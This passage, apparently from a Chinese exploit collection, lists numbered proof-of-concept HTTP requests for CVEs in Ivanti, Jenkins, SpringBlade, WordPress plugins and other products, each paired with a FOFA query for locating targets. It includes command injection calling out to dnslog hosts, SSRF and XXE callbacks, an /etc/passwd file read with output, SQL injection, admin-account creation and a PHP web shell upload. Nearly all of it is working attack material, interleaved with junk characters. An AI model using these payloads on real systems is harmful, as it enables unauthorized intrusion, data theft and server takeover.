) U. v1 t7 n1 `6 S3 x* e& C1 pX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
8 z" v1 u' O- ?4 J' w
$ R9 }/ ^, G1 z* C" @' R; @% m+ q0 {" Y/ d: h6 }, ?( |9 l7 ~$ i
98. SpiderFlow爬虫平台远程命令执行
: E. r, P6 W9 B- O# @CVE-2024-0195! B# ~. L% x/ v$ ?: x
FOFA:app="SpiderFlow") ~* {& O4 K3 k1 @# o, M1 }1 v
POST /function/save HTTP/1.1; L# F  c0 `0 Z7 i# @; ^
Host: 192.168.40.130:8088
/ b# A7 o8 G1 V1 h* BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.05 H. u) @; q: g' ^; ^
Connection: close
/ M3 |* w3 o4 ~7 r7 K$ oContent-Length: 121
* u+ j: v7 c$ a3 h3 w, A1 t8 @Accept: */*
0 r/ F# G) m# |Accept-Encoding: gzip, deflate
4 t$ m6 Z# I0 A% i) C" xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  b* \# v5 p' l: g5 hContent-Type: application/x-www-form-urlencoded; charset=UTF-84 F/ r, m2 f7 e% J  [, w$ J
X-Requested-With: XMLHttpRequest
8 q4 j0 ]1 i. I. H9 t2 e- t4 x
2 v% q* u; e  ~6 @- a" Iid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
4 {$ J" S7 A" Y3 |, \, Z5 g
9 c1 ~) }0 Y8 N. k, S2 J
' O9 V" q. N* M2 a. A3 N+ w99. Ncast盈可视高清智能录播系统busiFacade RCE
" h" s* |8 I: N. x3 GCVE-2024-0305! [1 ]7 ?1 \% z) _: [' x
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
2 v8 V/ U1 C, j) E- LPOST /classes/common/busiFacade.php HTTP/1.1
9 w5 r  E1 C& X& c( c( j; X1 pHost: 192.168.40.130:80802 N5 B' B; C) ^* i( T5 c  b( B2 F6 M# B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 @% @; R- w8 }& g3 A9 L
Connection: close& m/ K; n( Z! h9 @
Content-Length: 154
! q3 K: c5 n% `8 ^7 gAccept: */*" _  ~2 p/ g* L" Y
Accept-Encoding: gzip, deflate
8 z8 C9 ?! ?2 h7 _" p& i. @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 [, i# K$ B! F% F' A6 KContent-Type: application/x-www-form-urlencoded; charset=UTF-8
. A  z( C) g1 R9 |# `3 D0 e/ eX-Requested-With: XMLHttpRequest
% I( d5 v" m' m, h& U; ^
/ M. w4 l, S/ l) V. J7 M%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D, z" D/ h  x) A  w, \6 h4 t* @2 a
7 Z! y0 p& Z4 C% N
' g& n& @5 B# }% Z; U9 P
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 V+ S) ~2 ~; T8 i+ h; pCVE-2024-0352
; q; r! Q9 A* r  o, s, WFOFA:icon_hash="874152924"
2 ~  x0 A9 s2 n9 S  A7 ]POST /api/file/formimage HTTP/1.1
, f  O! \: I* m5 ]: kHost: 192.168.40.130
; L, a' R7 X0 x7 jUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36: @9 \! ?8 Y! k4 d5 H# ?
Connection: close
* I, `/ G! _& ^( s4 w/ oContent-Length: 201; \; u, U, D( W) o8 w( N# s/ b" P, |/ @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
" H% x' |) n6 a2 C2 `Accept-Encoding: gzip9 {4 B& e* [1 h3 ^6 T3 x
: e! d  `: S0 E4 D- ]( f) I
------WebKitFormBoundarygcflwtei
5 K+ O% m8 |( ]) fContent-Disposition: form-data; name="file";filename="IE4MGP.php"
- u& w0 T! J! uContent-Type: application/x-php
4 I% _! q. h( K3 g6 \; k0 |/ U* k$ U7 `. h1 S3 `/ J8 o. G
2ayyhRXiAsKXL8olvF5s4qqyI2O& {9 c6 {2 ?7 b- I' ]% v
------WebKitFormBoundarygcflwtei--
  W5 H( X# [; J
; o7 j( E/ D+ w+ V' C
1 S4 `1 \1 O# s; H3 C' V7 R101. ivanti policy secure-22.6命令注入
8 @: I* F( T2 \4 |( Q1 fCVE-2024-218874 ^* V3 M  }$ f+ M1 p3 V0 }- ]
FOFA:body="welcome.cgi?p=logo". n/ u# g6 D- L, ~8 C% V7 Y
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1) A5 b1 Q% O; x3 E
Host: x.x.x.xx.x.x.x
) `/ ?: F5 g4 K' LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 w7 d6 K  d* s) p! H5 p- mConnection: close
$ X4 [$ T7 z7 x! fAccept-Encoding: gzip
2 @0 L# V2 J1 u0 g9 y" \0 e: U) x8 @: \, `. g

' A4 ]6 n  |2 R5 _" c# o% ]102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( X( I; I+ ?: f: J
CVE-2024-21893
' V9 R; l1 Q7 \( L% Y/ U8 SFOFA:body="welcome.cgi?p=logo"% ~4 G7 y+ G- S0 q2 S) e3 K
POST /dana-ws/saml20.ws HTTP/1.1
- |+ s5 W% h0 x! ~" w4 qHost: x.x.x.x
/ A8 r( a* Y- `- lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ {9 L6 ?) {/ q: D# i% mConnection: close
9 S) E$ S, I1 c+ G! _Content-Length: 792
! P! [- f1 b/ O  F- b6 u* BAccept-Encoding: gzip9 X7 D, u. K7 k) u( Q, z2 z
5 q* o, Z3 {  u9 E1 s
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>6 a: C/ Y8 F# P
; [# D- l' i" P8 q& w2 L; B2 F
103. Ivanti Pulse Connect Secure VPN XXE
# R4 ~! l0 L5 w* y& O$ `' F" BCVE-2024-22024
9 f, z! P! y7 L* e5 A, n* BFOFA:body="welcome.cgi?p=logo"
- X! @! I! n# N7 B7 k& v) }POST /dana-na/auth/saml-sso.cgi HTTP/1.1/ O; t) x* f7 |/ Q% S3 @+ Z
Host: 192.168.40.130:1116 S# u0 l4 ~( L$ m. z' b$ A
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
0 G" N6 t4 F( ^  gConnection: close! {' j, p% n0 n  r
Content-Length: 204
' z) N- g% Q# b& r6 ~( D8 PContent-Type: application/x-www-form-urlencoded  U+ z: a* w5 Y. f5 d# ]$ I
Accept-Encoding: gzip* a, b6 C7 S" W2 g
/ s5 s' M$ W% F" F$ b, W! {0 B5 r2 F
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==: e8 y7 v) Z/ U  E: h

+ I9 n+ X' q6 A, W0 x9 {7 [) y% W+ O4 W) T* h+ v. e
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
: ~/ n' p; ~0 I. {' Y6 }. P' S) u: \<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
; M9 P6 ~/ \- Y! r4 c  h* i* ?4 A8 v0 ?
8 X  S- R6 T% h8 F' n' U4 x9 L
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露, a. d$ _% P7 p7 \# Z& K. u
CVE-2024-0569
6 x8 ]6 h3 L% z0 CFOFA:title="TOTOLINK"3 x: `. G/ a% `+ e! l+ T
POST /cgi-bin/cstecgi.cgi HTTP/1.1
0 i$ `- v: k, _' z* s- a# ?- NHost:192.168.0.1
: G8 O. {* r& Q# O( I7 Z& H; TContent-Length:41% X) b1 x% t. d" K
Accept:application/json,text/javascript,*/*;q=0.01- M0 {& {' W6 _2 X
X-Requested-with: XMLHttpRequest
& o- l; U; j" z! e' IUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
. t3 l5 s" [, D5 f5 U3 S4 YContent-Type: application/x-www-form-urlencoded:charset=UTF-8! ]( I2 J: s  k% n: R$ E* C9 w. U
Origin: http://192.168.0.14 w/ a5 _4 |$ |. X; r
Referer: http://192.168.0.1/advance/index.html?time=1671152380564  X5 `4 ~( Y8 L7 s3 F1 c
Accept-Encoding:gzip,deflate9 }4 J$ g+ n9 e, u
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
% q! V- K/ q# J! B/ M2 M. y2 p, GConnection:close
% ^" L' }. ?2 a6 E- d& t3 x
9 d  K5 F6 B9 @$ T5 c{; O/ C8 ?- Y+ c7 |9 A1 U
"topicurl":"getSysStatusCfg",
5 ]# b' t% o; J1 K! z& P"token":""
+ @! {" A- J+ g9 X& L7 {}% q% V7 z8 s  _, C3 Q# ]
2 U; @) Z; L6 v$ ~( L# ^
105. SpringBlade v3.2.0 export-user SQL 注入
  d3 v/ T0 [+ H4 q; S- GFOFA:body="https://bladex.vip"4 M, L: H0 D/ q1 u! g
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=17 b+ R7 V+ b, u; m

( Q% N3 s  v/ o: M106. SpringBlade dict-biz/list SQL 注入
: ^5 |) ^7 e" gFOFA:body="Saber 将不能正常工作"  X& |* M% H$ j' C9 F6 O& [( ]
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1$ Z& V2 I) M* e" c/ \6 }7 L1 D
Host: your-ip  `* c5 x7 V2 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; ?/ z& w. A) s4 T. J& ABlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
5 p# ~0 z( {4 L- H+ k% JAccept-Encoding: gzip, deflate& c% s" |3 S6 t( y0 p7 j
Accept-Language: zh-CN,zh;q=0.9% `3 t2 {* H4 y. |& O) [
Connection: close: R6 E8 y  o% }; ?& o9 X; E

. g: @4 G& q2 H! `# ]( K7 J: Q- t1 Z# ^; W, {2 [9 ^+ a3 d; J0 H8 m
107. SpringBlade tenant/list SQL 注入
" v$ V/ K) p5 P" I* A$ NFOFA:body="https://bladex.vip"
" \0 M( s7 o: q: b7 |GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
: y: L; V4 N0 T9 P$ [Host: your-ip
) z* i- \9 s% @3 \$ qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% s& O/ K2 z( O! n8 i/ D
Blade-Auth:替换为自己的( c+ j: |; v* O; _- ^
Connection: close; n1 K, U+ i6 ~( ^, c  U  S

! S' m1 r. M3 C
7 W, ]; G/ X, W% _2 D108. D-Tale 3.9.0 SSRF
; ~+ [! V# y* R$ g& X) qCVE-2024-21642
0 j6 q" a0 W9 x: E* s6 i6 qFOFA:"dtale/static/images/favicon.png"& P$ Y4 s4 \- T3 h: D
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.12 p( P7 f6 ^7 i  O; j! t7 W
Host: your-ip0 ^( n* _$ w5 I3 L7 |; m1 ]+ H
Accept: application/json, text/plain, */*+ b: _: F: {- @+ v: A7 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
  A) k) }' F& l4 K, g( vAccept-Encoding: gzip, deflate3 H$ h" k5 w8 F9 j7 [0 g2 ?
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8; M6 z8 J  ^' b( W5 p
Connection: close/ Z% H8 U$ r8 a1 ?

6 u# G  g% {+ l. o1 }' @! e4 c# N( h. y7 k" p+ k& t& O$ n
109. Jenkins CLI 任意文件读取6 X) a1 J% X. Q& B0 I
CVE-2024-23897
1 n7 ?8 C) d3 D3 F1 J5 s, CFOFA:header="X-Jenkins"
; u9 P- n5 A9 v* GPOST /cli?remoting=false HTTP/1.1
# p- B. q4 w0 |, l2 ~6 o/ C9 iHost:- J) w3 U8 C& }* W2 ^& \
Content-type: application/octet-stream
6 Z2 X' K: V7 Q' C# I3 Z" cSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
$ X8 }1 p& h0 h" N2 b1 Z' ^Side: upload: k0 n7 P# V% K5 e/ l5 d
Connection: keep-alive  {3 T+ r- e% k/ |
Content-Length: 163
) R) w* {# j: I. r) H! t5 T
9 p! U: Y- ^5 B! e3 Z" V* Nb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'8 ]/ _& p- ]* h% i
* p5 _4 B+ L, A- v) s& k
3 N$ [, F$ j3 N' j6 J
POST /cli?remoting=false HTTP/1.10 S, v" a; N5 a4 x- r: }
Host:
& }* J" V1 R3 }8 }  L4 OSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
6 w& y$ a* Z) `  f9 m' T9 Idownload
% c0 D$ f( R& q- bContent-Type: application/x-www-form-urlencoded( E2 E' h+ |* h* U" _
Content-Length: 09 U- V( }+ @1 \

) |+ J. ?- B- u7 ~: ?% P* a' D% A' I/ Y. p& Z
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin( P9 _( I! C2 B9 ]8 G
java -jar jenkins-cli.jar help
" e4 x. z1 L$ d( l7 `/ d% P[COMMAND]/ C: u/ l# ]3 D; z) F! {* G7 Q# A
Lists all the available commands or a detailed description of single command.4 c1 l& J! H$ V6 D: u- {
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
# [8 J# `1 i; s: P
% a5 l; u5 B8 U+ A: M% q! N* `, p: K; q& m* s8 X
110. Goanywhere MFT 未授权创建管理员" u$ C& ]. r8 b# {& x' W, X. j
CVE-2024-02047 k) N9 j! H) K! q0 t) p
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
5 Q9 a/ O9 d# G! S' cGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1% f6 a' w0 A9 o, F& D8 W: b1 W% E
Host: 192.168.40.130:8000
2 F* v. d* n' j! H% J+ j  SUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
- d. N) p3 S- B2 `$ Q' J7 U7 jConnection: close1 w7 ?! ?, c* H0 u2 Y/ Q+ G' V
Accept: */*- P3 D: ~- W8 q; n
Accept-Language: en
; N' m2 l" ]2 z8 h" ?; NAccept-Encoding: gzip
% R+ m; s; C" c' w+ [5 y; n5 ^9 t( Q  C8 l- T8 ~9 P  Y0 m1 P) ~

& a7 d; q- i) o( x, l1 t$ }: n5 Z( u111. WordPress Plugin HTML5 Video Player SQL注入
; F9 e$ \0 A, f+ B  _3 e4 ?4 mCVE-2024-1061- J0 A" C. [  I
FOFA:"wordpress" && body="html5-video-player"5 K0 n; Z: n/ M
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
/ F# p: E* j4 m* K7 q$ \1 g% \" sHost: 192.168.40.130:1122 r, T) B9 w' G& _* A5 m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' {8 x. p* ^. m+ Y; r2 j7 ZConnection: close
* E- P3 u2 h: e: TAccept: */*
1 x3 R+ O7 j, f. v# eAccept-Language: en
% e! Q3 Y% o# t6 D" U( t. }% UAccept-Encoding: gzip
/ x) y$ ]; N9 y8 D' Z
1 s. c7 G7 t0 ^; _2 C
" C7 D4 w. f9 J  o; y112. WordPress Plugin NotificationX SQL 注入
) Z- P4 d, H. a* P% {1 KCVE-2024-1698: {$ x: U% s! x" p5 @8 `) y
FOFA:body="/wp-content/plugins/notificationx"
5 E0 z% N5 E: @5 vPOST /wp-json/notificationx/v1/analytics HTTP/1.1: }. T$ [6 i0 d1 C. s% k% O
Host: {{Hostname}}
+ Z  A; t  w  F$ M6 E+ b  ?Content-Type: application/json3 `7 L  S2 J& f% E+ O
+ d7 D$ X  R; Q# X
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}9 `! N: R7 M8 n8 e/ o

) v+ I1 h* A) m; I  X. E
& G' t! h- b5 q. m) t) x1 m  ?. L113. WordPress Automatic 插件任意文件下载和SSRF! u3 G& F! G' M8 S  q) R
CVE-2024-27954# Y8 p0 ?& z- w0 |; n
FOFA:"/wp-content/plugins/wp-automatic"2 w/ c5 ^& w) G8 |
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.13 I" f7 F% G3 j* l$ N
Host: x.x.x.x$ B) s) A, M& a% U
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36' o7 {( b2 @2 q  m' e9 I6 P+ f, w7 a; S( {
Connection: close
$ g# W4 S0 n3 u. ]. ]- EAccept: */*; d/ U" x2 l! T7 {3 g, }
Accept-Language: en
6 ]  H6 _/ K( s4 ~) L' r9 YAccept-Encoding: gzip
& ?, f, `; |/ ?5 M5 j1 M. \6 a
/ G4 K0 U2 C- A% T' I& P# e3 X1 w8 X" k' s: k9 V
114. WordPress MasterStudy LMS插件 SQL注入
4 k( K. |5 C3 G; V+ q9 nFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
1 k9 b% j; N, z! kGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1: m$ C. R; s* L. B
Host: your-ip( Y" P6 y4 Q' T# t7 d# R
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
0 h6 [- v4 c% |% h( y, f' |Accept-Charset: utf-84 x: W; K4 a8 m2 M, v& Y
Accept-Encoding: gzip, deflate0 [; a7 Q  D3 Q8 x
Connection: close
! O/ c7 X0 e1 Y( ]) O" U+ l' ]4 i. E
( w" s: x4 x8 S9 q% v6 u
115. WordPress Bricks Builder <= 1.9.6 RCE
  `: C1 L& c# o' uCVE-2024-25600! C2 D* B4 @( {5 n3 Y/ e8 Z4 @
FOFA: body="/wp-content/themes/bricks/"
+ [0 n6 A; E- V' ~第一步,获取网站的nonce值
+ M) j/ _+ r. v" N! `* U, y1 ^GET / HTTP/1.1
! o  W# ~2 w8 [0 E5 ?3 THost: x.x.x.x9 K1 Y% `( L" U0 R% Y  l. r( ~) q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
8 r. H6 X9 B- l) M* r3 d9 ?  aConnection: close: d1 Y$ l& q+ v2 m; P  o
Accept-Encoding: gzip
" D$ Q0 m4 Q/ _! j$ F! T; ~1 A! Q+ H8 b7 N3 e; r4 i9 o% U0 H
, S) L) f3 v( y! l( W7 \
第二步替换nonce值,执行命令6 @4 y: v* W; `% U& Q- W3 R
POST /wp-json/bricks/v1/render_element HTTP/1.1; l0 l1 E# B. E- k+ R
Host: x.x.x.x- H0 V( m1 G- R0 _0 e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 z- {# ?; Q( F: l5 t
Connection: close' f% E9 W% Z* ?% {$ o5 Q* A$ Q) z6 Q
Content-Length: 356
9 I2 P% M. ?; cContent-Type: application/json
2 u. u" o+ S; NAccept-Encoding: gzip) G/ j# E: h7 x5 b4 k

, z0 H# q9 b+ }6 `  \{( _; M7 S7 \# {/ c7 y( X2 W& @& G
"postId": "1",4 p! l, C5 i- A
  "nonce": "第一步获得的值",- u9 c5 M8 L! O( C& K9 E3 N
  "element": {. ~: U8 D( w9 k8 Z- \: A  Z* s
    "name": "container",
( A4 {3 U% e2 C6 W* c    "settings": {$ v) }( q) J# _; K% @7 `# V2 A. O
      "hasLoop": "true",
0 G) Y$ C6 q6 G$ G9 t      "query": {  Q$ @3 r3 q# w/ z
        "useQueryEditor": true,
4 |; V" S  W: B! X1 M# H( }        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",+ @2 D! }7 t! D
        "objectType": "post"; k5 H3 u+ ]: L0 ]( J! F
      }
8 c, u* k) a/ h/ L* S! [/ R9 c    }
) k+ A4 i9 M- M6 L  }* u' U! k, r4 B; q
}8 e" |% B2 q/ _5 \; ]

- E4 j1 Q: B* ~+ E0 V; O; K. _; o: }2 Z
. L& F8 F( F' o! @116. wordpress js-support-ticket文件上传# y* U) i6 l: w; e3 A- S# ?
FOFA:body="wp-content/plugins/js-support-ticket"6 f0 W+ g! X9 P& }; |
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
& Q# }/ d5 Z6 Y/ D8 }! o, x1 pHost:: q, D5 F- o  {$ k
Content-Type: multipart/form-data; boundary=--------767099171
) \4 h9 }3 l. w, mUser-Agent: Mozilla/5.0
! ?+ J- ]+ d7 c  F9 v
$ l7 r1 d3 J8 L& x( ?----------767099171, B* i6 U: }9 H2 `2 r0 I! }" U
Content-Disposition: form-data; name="action"
: ~7 x' u4 I: }1 [; s' K  P9 Sconfiguration_saveconfiguration8 g# M* c% m5 \& P* Z
----------767099171" t; N2 U/ b* @$ R' T7 F
Content-Disposition: form-data; name="form_request"9 J% S+ Q# N& x* |5 O2 |- P
jssupportticket0 b, p  ~* o8 B, ]. _$ t$ s
----------767099171
  d' v* c) |6 ~5 d6 A! OContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"2 ^' Z* U) ^: `  L6 e, r# N4 k
Content-Type: image/png( g+ Y5 h! T& c$ E8 E$ c" n- _
----------767099171--
- V: b+ n* ?, ]: s6 u1 `4 q
, Z1 G/ A& K2 P! G0 e" F9 e# j
7 k6 C) n0 W4 i5 }: ?" S6 u( V117. WordPress LayerSlider插件SQL注入1 m5 g2 A& R9 d1 ?" y" h3 Y- |
version:7.9.11 – 7.10.0
2 K# T6 S6 t# D* ~FOFA:body="/wp-content/plugins/LayerSlider/"/ Q& W& Q1 L' [5 q; |* I
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
  I; z! n% O% k* G& R* o- @2 @  dHost: your-ip
9 ^' A6 d7 r7 n- }( f: KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 }7 B9 B. s; z! ^5 [1 ]8 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& y8 E+ P$ ]3 x2 w/ Y1 Z3 JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 t' N: b  F# p- W. J9 X6 ?# s
Accept-Encoding: gzip, deflate, br
* |/ k. c; a. I  t' dConnection: close
# h+ N" p! P; l6 q9 n/ ]; wUpgrade-Insecure-Requests: 1
( c% T* D- P6 @4 |
$ Z6 ^) y, I  R. n, K" E; U
, f3 e, z' O! _' o118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ n2 @4 I- c8 ^/ d- d* U3 l
CVE-2024-0939
4 l8 z! Q0 p' nFOFA:title="Smart管理平台"8 V1 \# ?, L/ J/ Y+ A3 s2 I
POST /Tool/uploadfile.php? HTTP/1.12 g$ Y& a2 D: U" A1 o6 }
Host: 192.168.40.130:8443
* |8 u+ P9 i6 m9 j5 vCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8" X, I, h7 ?- {+ E' c3 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
' v; U4 Y5 e. U1 r* [' dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# u9 b# F9 {5 T6 X6 @# R8 g5 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' w7 E# H% }5 }3 D4 w0 h9 P! G
Accept-Encoding: gzip, deflate
/ J4 t& S& u7 w( r- Y$ ~% WContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
7 c* x. A8 w# V/ X5 H$ eContent-Length: 405& S+ W8 ]" {5 V' J
Origin: https://192.168.40.130:84434 q) L" H4 H, X# G7 D$ Q4 o" d/ L
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
5 {" A% Z+ {2 q5 xUpgrade-Insecure-Requests: 14 r/ l4 T. q  `. \! X
Sec-Fetch-Dest: document
8 w9 k( {; e$ I) I8 }+ U$ pSec-Fetch-Mode: navigate. M* [9 n1 @: K$ Q& s7 B1 Z
Sec-Fetch-Site: same-origin6 i$ ]" }( m1 d4 L) }  p* c
Sec-Fetch-User: ?1
1 U7 w7 @, N9 U7 M9 Y: RTe: trailers  \4 R/ W$ j2 D8 A6 H
Connection: close
& l2 L8 @9 F. D* `8 i" i3 ?: F* X* }" X4 H4 j# z
-----------------------------13979701222747646634037182887
$ g' f% K: M! K. Y5 X4 V3 J$ LContent-Disposition: form-data; name="file_upload"; filename="contents.php"! S5 v( Z& A1 X% b/ p: V. i
Content-Type: application/octet-stream0 ]( }0 U3 A  r/ T  O
0 A8 |' T/ Y6 A' \& P
<?php
6 ~1 Q4 `* ^, y! g& f. [! wsystem($_POST["passwd"]);* t: p, G+ X4 r
?>
7 x# G! N' U% x0 N-----------------------------13979701222747646634037182887
- P- E" {3 n0 z- H" E1 xContent-Disposition: form-data; name="txt_path"0 `' h4 E$ s& P- |( q& C. G" ?

7 \7 Z. @2 m# P% l: q' ~" L/home/src.php- L: `" k" z& |
-----------------------------13979701222747646634037182887--
& i$ L1 c% q, U
3 R- i0 e3 I# R, s+ [% B+ a. p9 u& _$ P* e
访问/home/src.php
- U" R4 S! F  e3 m5 U0 ~+ e, Y2 M0 z1 t
119. 北京百绰智能S20后台sysmanageajax.php sql注入& m6 ~9 {0 x7 N# i! `* d: g
CVE-2024-1254
% O; Y0 o8 `$ X  B% s2 ^FOFA:title="Smart管理平台"
